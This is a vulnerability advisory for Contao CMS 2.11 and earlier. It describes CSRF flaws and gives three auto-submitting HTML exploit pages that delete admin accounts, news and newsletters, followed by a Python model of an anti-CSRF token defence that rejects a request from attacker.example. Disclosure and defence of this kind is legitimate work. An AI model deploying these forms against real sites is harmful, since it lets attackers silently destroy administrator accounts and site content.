Title: ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin / Delete Article)
Author: Ivano Binetti (http://ivanobinetti.com)
Download: http://www.contao.org/en/download.html
Vendor site: http://www.contao.org
Affected versions: 2.11.0 (latest) and lower
Tested on: Debian Squeeze (6.0)

+--------------------------------------------------------------------------------------------------------------------------------+
+------------------------------------------[Multiple vulnerabilities by Ivano Binetti]-------------------------------------------+

Summary
1) Application description
2) Vulnerability description
   2.1 Delete admin or user
   2.2 Delete news
   2.3 Delete newsletter

+--------------------------------------------------------------------------------------------------------------------------------+

1) Application description

Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that is easy to maintain".

2) Vulnerability description

Contao 2.11 (and lower) is affected by a CSRF vulnerability which allows an attacker to delete admins/users and to delete web content (articles, news, newsletters and so on). The backend accepts state-changing requests such as main.php?do=<module>&act=delete&id=<n> without a per-session anti-CSRF token, so a page on another site that auto-submits a form to that URL is executed with the logged-in victim's session.

2.1 Delete admin or user

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete ADMIN/USER account</H2>
<form method="POST" name="form0" action="http:// www.2cto.com /contao/main.php?do=user&act=delete&id=2">
</form>
</body>
</html>

Note that it is possible to delete any admin/user, including the first administrator (id=1) created during Contao's installation phase.

2.2 Delete news

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete news</H2>
<form method="POST" name="form0" action="http:// www.2cto.com /contao/main.php?do=news&act=delete&id=1">
</form>
</body>
</html>

2.3 Delete newsletter

<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to delete newsletter</H2>
<form method="POST" name="form0" action="http:// www.2cto.com /contao/contao/main.php?do=newsletter&act=delete&id=1">
</form>
</body>
</html>
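The fix for this class of bug is a synchronizer token bound to the login session, checked on every state-changing backend action, with the Origin/Referer header as a secondary check. The following is an added example, not Contao's code: a minimal model of the main.php?do=...&act=delete&id=... dispatcher from the advisory, showing the auto-submitted cross-site POST being rejected while a form rendered by the backend itself passes. The origin https://cms.example and the hidden field name REQUEST_TOKEN are assumptions for illustration.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "https://cms.example"   # constructed: origin the backend is served from
STATE_CHANGING_ACTS = {"delete"}      # main.php?act=delete is what the advisory abuses


def new_session():
    """Constructed login session: one unguessable anti-CSRF token per session."""
    return {"user": "admin", "csrf_token": secrets.token_hex(16)}


def origin_matches(headers):
    """Secondary check: if the browser sent Origin or Referer it must be our site.
    When neither header is present we fall through to the token check, which is
    the primary defence and does not depend on the browser sending headers."""
    sent = headers.get("Origin") or headers.get("Referer")
    if sent is None:
        return True
    parts = urlsplit(sent)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def handle_request(session, method, url, form, headers):
    """Model of the backend dispatcher. Returns (status, message)."""
    query = parse_qs(urlsplit(url).query)
    module = query.get("do", [""])[0]
    act = query.get("act", [""])[0]
    item_id = query.get("id", [""])[0]
    if act in STATE_CHANGING_ACTS:
        if method != "POST":
            return 405, "state-changing actions must be POSTed"
        # A page on another origin cannot read the victim's token, so an
        # auto-submitted form arrives without it (or with a stale guess).
        token = form.get("REQUEST_TOKEN", "")   # assumed hidden-field name
        if not hmac.compare_digest(token, session["csrf_token"]):
            return 403, "missing or invalid request token"
        if not origin_matches(headers):
            return 403, "cross-origin request rejected"
    return 200, f"{module} {act} id={item_id}"


if __name__ == "__main__":
    s = new_session()
    url = "/contao/main.php?do=user&act=delete&id=2"
    # The advisory's page: empty auto-submitted POST, browser attaches the cookie
    print(handle_request(s, "POST", url, {}, {"Origin": "http://attacker.example"}))
    # A form rendered by the backend carries the session's token
    print(handle_request(s, "POST", url, {"REQUEST_TOKEN": s["csrf_token"]},
                         {"Origin": SITE_ORIGIN}))
```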